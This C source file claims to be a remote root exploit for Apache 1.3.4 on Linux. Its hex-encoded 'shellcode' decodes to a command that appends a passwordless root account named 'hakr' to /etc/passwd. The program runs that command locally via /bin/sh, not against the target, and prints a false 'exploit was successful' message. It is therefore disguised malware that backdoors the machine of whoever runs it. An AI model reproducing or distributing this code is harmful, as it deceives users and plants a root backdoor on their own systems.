/* remote apache 1.3.4 root exploit (linux) */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
	"\x65\x63\x68\x6f\x20\x68\x61\x6b\x72\x3a\x3a\x30\x3a"
	"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
	"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

#define	NOP	0x90
#define	BSIZE	256
#define	OFFSET	400
#define	ADDR	0xbffff658
#define ASIZE	2000

int
main(int argc, char *argv[])
{
	char *buffer;
	int s;
	struct hostent *hp;
	struct sockaddr_in sin;
	if (argc != 2) {
		printf("%s <target>\n", argv[0]);
		exit(1);
	  }
	buffer = (char *) malloc(BSIZE + ASIZE + 100);
	if (buffer == NULL) {
		printf("Not enough memory\n");
		exit(1);
	  }
	memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
		strlen(shellcode));
	buffer[BSIZE + ASIZE] = ';';
	buffer[BSIZE + ASIZE + 1] = '\0';
	hp = gethostbyname(argv[1]);
	if (hp == NULL) {
		printf("no such server\n");
		exit(1);
	  }
	bzero(&sin, sizeof(sin));
	bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(80);
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s < 0) {
		printf("Can't open socket\n");
		exit(1);
	  }
	if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
		printf("Connection refused\n");
		exit(1);
	  }
	printf("sending exploit code...\n");
	if (send(s, buffer, strlen(buffer), 0) != 1)
		printf("exploit was successful!\n");
	  else
		printf("sorry, this site isn't vulnerable\n");
	printf("waiting for shell.....\n");
	if (fork() == 0)
		execl("/bin/sh", "sh", "-c", shellcode, 0);
	  else
		wait(NULL);
	while (1) { /* shell */ }
}